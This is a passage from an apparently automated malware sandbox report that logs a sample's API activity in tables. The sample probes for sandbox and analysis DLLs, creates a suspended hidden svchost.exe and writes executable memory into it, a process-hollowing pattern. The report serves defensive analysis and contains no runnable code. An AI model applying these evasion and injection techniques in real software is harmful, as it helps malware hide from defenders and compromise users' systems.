| Get Address | c:\windows\syswow64\kernel32.dll | function = UnmapViewOfFile, address_out = 0x75dd1826 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x75dd186e |
|
1 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | msPin | class_name = cmsPin, wndproc_parameter = 0 |
|
1 | |
| Create | ï™ @ | class_name = button, wndproc_parameter = 0 |
|
1 | |
| Create | ï™ @ | class_name = STATIC, wndproc_parameter = 0 |
|
1 | |
| Create | class_name = richedit, wndproc_parameter = 0 |
|
1 | ||
| Create | class_name = EDIT, wndproc_parameter = 0 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = AUFDDCNTXWT |
|
1 | |
| Sleep | duration = 3000 milliseconds (3.000 seconds) |
|
1 | |
| Sleep | duration = 5000 milliseconds (5.000 seconds) |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe |
| Command Line | "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe" |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\ |
| Monitor | Start Time: 00:01:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:51 |
| Information | Value |
|---|---|
| PID | 0xb68 |
| Parent PID | 0xb18 (c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B6C
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp | desired_access = GENERIC_READ |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ | value_name = ProductName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ | value_name = ProductName, data = 87 |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | svchost.exe | os_pid = 0x830, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
2 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Resume | c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | os_tid = 0xb6c |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | svchost.exe | address = 0x18ce98, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625672 |
|
2 | |
| Allocate | svchost.exe | address = 0x18cde0, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625672 |
|
1 | |
| Allocate | svchost.exe | address = 0x18cd70, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625592 |
|
1 | |
| Allocate | svchost.exe | address = 0x18cd80, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1625728 |
|
6 | |
| Allocate | svchost.exe | address = 0x18cd38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624776 |
|
7 | |
| Allocate | svchost.exe | address = 0x18c948, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624312 |
|
7 | |
| Allocate | svchost.exe | address = 0x18cca8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625304 |
|
71 | |
| Allocate | svchost.exe | address = 0x18cb38, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1624808 |
|
79 | |
| Allocate | svchost.exe | address = 0x18cd40, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625280 |
|
8 | |
| Allocate | svchost.exe | address = 0x18cd30, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625400 |
|
1 | |
| Allocate | svchost.exe | address = 0x18cc88, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1625144 |
|
1 | |
| Free | svchost.exe | address = 0x18c9a8, free_type = MEM_RELEASE, size = 1624472 |
|
7 | |
| Free | svchost.exe | address = 0x18cad8, free_type = MEM_RELEASE, size = 1624784 |
|
7 | |
| Free | svchost.exe | address = 0x18cb98, free_type = MEM_RELEASE, size = 1624968 |
|
79 | |
| Free | svchost.exe | address = 0x18ccc8, free_type = MEM_RELEASE, size = 1625296 |
|
79 | |
| Protect | svchost.exe | address = 0xff5a246c, protection = PAGE_EXECUTE_READWRITE, size = 1625752 |
|
1 | |
| Protect | svchost.exe | address = 0x140000000, protection = PAGE_READONLY, size = 1625576 |
|
1 | |
| Protect | svchost.exe | address = 0x140001000, protection = PAGE_EXECUTE_READ, size = 1625704 |
|
1 | |
| Protect | svchost.exe | address = 0x140019000, protection = PAGE_READONLY, size = 1625704 |
|
1 | |
| Protect | svchost.exe | address = 0x140020000, protection = PAGE_READWRITE, size = 1625704 |
|
1 | |
| Protect | svchost.exe | address = 0x140021000, protection = PAGE_READONLY, size = 1625704 |
|
1 | |
| Protect | svchost.exe | address = 0x140023000, protection = PAGE_READONLY, size = 1625704 |
|
1 | |
| Protect | svchost.exe | address = 0x140024000, protection = PAGE_READONLY, size = 1625704 |
|
1 | |
| Read | svchost.exe | address = 0x7fffffd6000, size = 712 |
|
1 | |
| Read | svchost.exe | address = 0xff5a0000, size = 64 |
|
1 | |
| Read | svchost.exe | address = 0xff5a00e8, size = 264 |
|
1 | |
| Read | svchost.exe | address = 0x60000, size = 72 |
|
174 | |
| Read | svchost.exe | address = 0x20025, size = 8 |
|
4 | |
| Read | svchost.exe | address = 0x20017, size = 8 |
|
5 | |
| Read | svchost.exe | address = 0x20019, size = 8 |
|
3 | |
| Read | svchost.exe | address = 0x20022, size = 8 |
|
3 | |
| Read | svchost.exe | address = 0x20021, size = 8 |
|
6 | |
| Read | svchost.exe | address = 0x20016, size = 8 |
|
5 | |
| Read | svchost.exe | address = 0x2001b, size = 8 |
|
2 | |
| Read | svchost.exe | address = 0x20018, size = 8 |
|
3 | |
| Read | svchost.exe | address = 0x20015, size = 8 |
|
2 | |
| Read | svchost.exe | address = 0x2001f, size = 8 |
|
7 | |
| Read | svchost.exe | address = 0x2001c, size = 8 |
|
4 | |
| Read | svchost.exe | address = 0x2001a, size = 8 |
|
2 | |
| Read | svchost.exe | address = 0x20023, size = 8 |
|
7 | |
| Read | svchost.exe | address = 0x20026, size = 8 |
|
2 | |
| Read | svchost.exe | address = 0x2001d, size = 8 |
|
6 | |
| Read | svchost.exe | address = 0x2001e, size = 8 |
|
1 | |
| Read | svchost.exe | address = 0x20029, size = 8 |
|
4 | |
| Read | svchost.exe | address = 0x20027, size = 8 |
|
3 | |
| Read | svchost.exe | address = 0x20028, size = 8 |
|
2 | |
| Read | svchost.exe | address = 0x20024, size = 8 |
|
2 | |
| Read | svchost.exe | address = 0x2002c, size = 8 |
|
1 | |
| Read | svchost.exe | address = 0x20020, size = 8 |
|
3 | |
| Read | svchost.exe | address = 0x20000, size = 8 |
|
8 | |
| Read | svchost.exe | address = 0x2002a, size = 8 |
|
1 | |
| Read | svchost.exe | address = 0x7fffffd6018, size = 8 |
|
1 | |
| Read | svchost.exe | address = 0x77672640, size = 48 |
|
1 | |
| Read | svchost.exe | address = 0x282800, size = 136 |
|
1 | |
| Write | svchost.exe | address = 0x50000, size = 544 |
|
1 | |
| Write | svchost.exe | address = 0x60000, size = 72 |
|
88 | |
| Write | svchost.exe | address = 0xff5a246c, size = 22 |
|
1 | |
| Write | svchost.exe | address = 0x140000000, size = 1024 |
|
1 | |
| Write | svchost.exe | address = 0x140001000, size = 96768 |
|
2 | |
| Write | svchost.exe | address = 0x140019000, size = 25088 |
|
2 | |
| Write | svchost.exe | address = 0x140020000, size = 2264 |
|
1 | |
| Write | svchost.exe | address = 0x140020000, size = 512 |
|
1 | |
| Write | svchost.exe | address = 0x140021000, size = 6144 |
|
2 | |
| Write | svchost.exe | address = 0x140023000, size = 1536 |
|
2 | |
| Write | svchost.exe | address = 0x140024000, size = 1536 |
|
2 | |
| Write | svchost.exe | address = 0x20010, size = 21 |
|
4 | |
| Write | svchost.exe | address = 0x20000, size = 16 |
|
79 | |
| Write | svchost.exe | address = 0x70000, size = 48 |
|
86 | |
| Write | svchost.exe | address = 0x20010, size = 7 |
|
5 | |
| Write | svchost.exe | address = 0x140019190, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 9 |
|
3 | |
| Write | svchost.exe | address = 0x140019198, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 18 |
|
3 | |
| Write | svchost.exe | address = 0x1400191a0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 17 |
|
6 | |
| Write | svchost.exe | address = 0x1400191a8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400191b0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 6 |
|
5 | |
| Write | svchost.exe | address = 0x1400191b8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 11 |
|
2 | |
| Write | svchost.exe | address = 0x1400191c0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 8 |
|
3 | |
| Write | svchost.exe | address = 0x1400191c8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 5 |
|
2 | |
| Write | svchost.exe | address = 0x1400191d0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 15 |
|
7 | |
| Write | svchost.exe | address = 0x1400191d8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400191e0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400191e8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400191f0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400191f8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019200, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 12 |
|
4 | |
| Write | svchost.exe | address = 0x140019208, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019210, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019218, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019220, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 10 |
|
2 | |
| Write | svchost.exe | address = 0x140019228, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 19 |
|
7 | |
| Write | svchost.exe | address = 0x140019230, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019238, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 22 |
|
2 | |
| Write | svchost.exe | address = 0x140019240, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019248, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019250, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019258, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019260, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 13 |
|
6 | |
| Write | svchost.exe | address = 0x140019268, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 14 |
|
1 | |
| Write | svchost.exe | address = 0x140019270, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019278, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019280, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019288, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 25 |
|
4 | |
| Write | svchost.exe | address = 0x140019010, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 23 |
|
3 | |
| Write | svchost.exe | address = 0x140019018, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019020, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019028, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019030, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019038, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019040, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 24 |
|
2 | |
| Write | svchost.exe | address = 0x140019048, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 20 |
|
2 | |
| Write | svchost.exe | address = 0x140019050, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019058, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019060, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019068, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019070, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 28 |
|
1 | |
| Write | svchost.exe | address = 0x140019078, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 16 |
|
3 | |
| Write | svchost.exe | address = 0x140019080, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019088, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019090, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019098, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190a0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190a8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190b0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190b8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019000, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019298, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400192a0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190c8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190d0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190d8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190e0, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190e8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x1400190f8, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019100, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019108, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019110, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019118, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019120, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019128, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019130, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019138, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019140, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 26 |
|
1 | |
| Write | svchost.exe | address = 0x140019148, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019150, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019160, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019168, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019170, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019178, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x140019180, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x7fffffd6010, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x282830, size = 8 |
|
1 | |
| Write | svchost.exe | address = 0x20010, size = 116 |
|
1 | |
| Write | svchost.exe | address = 0x282848, size = 16 |
|
1 | |
| Write | svchost.exe | address = 0x70000, size = 16 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Kernel32.dll | base_address = 0x75dc0000 |
|
1 | |
| Load | shell32.dll | base_address = 0x75fe0000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77720000 |
|
1 | |
| Load | shlwapi.dll | base_address = 0x76f10000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x77280000 |
|
1 | |
| Load | kernel32.dll | base_address = 0xc0000018 |
|
1 | |
| Load | kernelbase.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | base_address = 0x400000 |
|
3 | |
| Get Handle | cmdvrt32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | SxIn.dll | base_address = 0x0 |
|
1 | |
| Get Handle | SbieDll.dll | base_address = 0x0 |
|
1 | |
| Get Handle | Sf2.dll | base_address = 0x0 |
|
1 | |
| Get Handle | snxhk.dll | base_address = 0x0 |
|
1 | |
| Get Handle | dbghelp.dll | base_address = 0x0 |
|
1 | |
| Get Handle | api_log.dll | base_address = 0x0 |
|
1 | |
| Get Handle | dir_watch.dll | base_address = 0x0 |
|
1 | |
| Get Handle | pstorec.dll | base_address = 0x0 |
|
1 | |
| Get Handle | vmcheck.dll | base_address = 0x0 |
|
1 | |
| Get Handle | wpespy.dll | base_address = 0x0 |
|
1 | |
| Get Filename | wpespy.dll | process_name = c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe, file_name_orig = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75dd7a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x75dd435f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x75dd1856 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnmapViewOfFile, address_out = 0x75dd1826 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x75dd186e |
|
1 |
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | msPin | class_name = cmsPin, wndproc_parameter = 0 |
|
1 | |
| Create | ï™ @ | class_name = button, wndproc_parameter = 0 |
|
1 | |
| Create | ï™ @ | class_name = STATIC, wndproc_parameter = 0 |
|
1 | |
| Create | class_name = richedit, wndproc_parameter = 0 |
|
1 | ||
| Create | class_name = EDIT, wndproc_parameter = 0 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = AUFDDCNTXWT |
|
1 | |
| Sleep | duration = 3000 milliseconds (3.000 seconds) |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\ |
| Monitor | Start Time: 00:01:39, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:47 |
| Information | Value |
|---|---|
| PID | 0x830 |
| Parent PID | 0xb68 (c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
840
0x
8AC
0x
900
0x
8FC
0x
938
0x
964
0x
8D0
0x
984
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x50000, size = 544 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x60000, size = 72 |
|
88 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0xff5a246c, size = 22 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140000000, size = 1024 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140001000, size = 96768 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019000, size = 25088 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140020000, size = 2264 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140020000, size = 512 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140021000, size = 6144 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140023000, size = 1536 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140024000, size = 1536 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 21 |
|
4 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20000, size = 16 |
|
79 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x70000, size = 48 |
|
86 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 7 |
|
5 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019190, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 9 |
|
3 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019198, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 18 |
|
3 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191a0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 17 |
|
6 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191a8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191b0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 6 |
|
5 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191b8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 11 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191c0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 8 |
|
3 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191c8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 5 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191d0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 15 |
|
7 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191d8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191e0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191e8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191f0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400191f8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019200, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 12 |
|
4 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019208, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019210, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019218, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019220, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 10 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019228, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 19 |
|
7 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019230, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019238, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 22 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019240, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019248, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019250, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019258, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019260, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 13 |
|
6 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019268, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 14 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019270, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019278, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019280, size = 8 |
|
1 | |
